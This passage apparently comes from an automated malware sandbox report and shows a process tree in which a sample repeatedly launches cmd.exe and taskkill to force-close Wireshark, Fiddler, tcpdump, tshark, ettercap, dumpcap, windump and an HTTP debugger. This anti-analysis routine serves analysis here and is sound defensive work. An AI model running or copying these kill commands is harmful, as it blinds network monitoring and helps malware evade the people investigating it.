        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:2900
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        Kills process with taskkill
        
        PID:3304
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:2820
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:888
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:3484
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:440
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4504
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:3164
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:2360
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:1200
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:4964
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:1948
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:3544
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:4308
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:3812
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:5108
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:4136
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:2868
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:2888
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:840
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4348
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:1408
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:2068
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        Kills process with taskkill
        
        PID:2044
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:4224
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:4332
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:1400
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:220
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:2944
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:1392
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:3088
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:1136
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:3340
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:3512
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:3264
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:4008
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:2016
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:1480
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:440
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:1476
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:1368
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:1424
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:1784
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:1352
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:3096
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:3488
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:3332
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:3172
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:3868
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:4916
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        Kills process with taskkill
        
        PID:4524
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4776
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:3968
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4112
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:1348
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:4216
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:4628
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:2412
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:4744
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:1796
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:2264
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:2236
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:1608
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:1820
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:2992
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:4644
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:4160
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4468
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:2728
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:5032
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:4172
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:3376
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:4420
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:2416
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:3928
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:1976
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:1784
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:1880
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:3096
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:8
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:4148
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:32
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:2284
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:3984
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:4136
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4856
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:2888
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:4972
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        Kills process with taskkill
        
        PID:4112
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:2604
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:4216
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:4940
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:2412
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:2936
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:1796
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:4528
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:3168
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:3948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:4372
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:3540
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:3340
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:316
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:5072
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:5068
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:2820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:516
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:1012
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:4552
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:4404
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:1740
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:3004
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:400
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:2932
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:3544
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:4324
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:2284
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:4928
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:3428
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:2328
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:3344
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:636
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:3040
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:756
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:1016
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:3936
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:3964
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:4508
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:2280
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:2904
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:3032
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:1392
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:3356
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:4732
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:2900
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:1600
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:3756
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:5052
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:4828
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:888
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:4976
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:432
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:3744
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:4196
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:2792
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:2276
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:212
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:1948
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:5076
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:2856
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:840
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:5108
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:4960
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:548
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:4388
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:4188
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:756
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:4332
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:2788
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:1804
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:2256
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:2676
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:2904
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:4556
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:1608
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:4008
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:5064
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        Kills process with taskkill
        
        PID:1644
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:3304
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:1876
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:2864
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:1640
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:1480
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:3928
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:440
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:1576
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:1424
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:4148
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:2360
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:4052
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:400
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:4840
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:2856
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:3444
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:5108
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:2328
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:548
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:4540
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:4188
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:4224
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:4216
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        Kills process with taskkill
        
        PID:4744
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:4360
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:1508
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:2748
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:2944
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:4356
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        
        PID:1144
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:4072
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:1984
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:1644
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:3540
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:2212
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:5012
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:1968
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:2016
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:3584
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:4772
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:3336
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        Kills process with taskkill
        
        PID:4976
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:4964
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:4396
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
        6⤵
        
        PID:8
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM wireshark.exe
        7⤵
        Kills process with taskkill
        
        PID:544
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
        6⤵
        
        PID:1880
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tshark.exe
        7⤵
        
        PID:4524
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
        6⤵
        
        PID:2544
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM tcpdump.exe
        7⤵
        
        PID:3596
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
        6⤵
        
        PID:2684
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM ettercap.exe
        7⤵
        
        PID:3476
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
        6⤵
        
        PID:3428
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM dumpcap.exe
        7⤵
        
        PID:4856
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
        6⤵
        
        PID:4112
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM windump.exe
        7⤵
        
        PID:4972
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
        6⤵
        
        PID:4744
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM fiddler.exe
        7⤵
        
        PID:1844
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
        6⤵
        
        PID:2264
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM httpdebuggerui.exe
        7⤵
        
        PID:3028
      - C:\Windows\system32\cmd.exe
        
